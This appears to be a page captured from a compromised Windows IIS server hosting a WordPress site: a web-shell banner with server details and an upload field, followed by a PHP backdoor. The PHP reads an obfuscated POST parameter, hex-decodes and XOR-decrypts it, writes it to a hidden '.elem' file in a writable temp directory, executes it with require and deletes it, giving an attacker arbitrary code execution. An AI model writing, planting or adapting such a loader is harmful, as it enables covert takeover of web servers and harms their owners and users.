| Server IP : 103.191.208.88 / Your IP : 216.73.216.44 Web Server : Microsoft-IIS/10.0 System : Windows NT COSMIC 10.0 build 20348 (Windows Server 2022) AMD64 User : IWPD_1831(willswel_) ( 0) PHP Version : 8.2.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : D:/Inetpub/vhosts/willswell.com/httpdocs/wp-content/themes/ |
Upload File : |
<?php
if(array_key_exists("d\x63\x68\x75nk", $_POST)){
$holder = hex2bin($_POST["d\x63\x68\x75nk"]);
$reference = ''; $p=0;do{$reference.=chr(ord($holder[$p])^49);$p++;}while($p<strlen($holder));
$rec = array_filter([session_save_path(), getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), "/tmp", getenv("TEMP"), "/var/tmp", sys_get_temp_dir()]);
$pset = 0;
do {
$flag = $rec[$pset] ?? null;
if ($pset >= count(rec)) break;
if ((bool)is_dir($flag) && (bool)is_writable($flag)) {
$record = "$flag/.elem";
if (file_put_contents($record, $reference)) {
require $record;
unlink($record);
exit;
}
}
$pset++;
} while (true);
}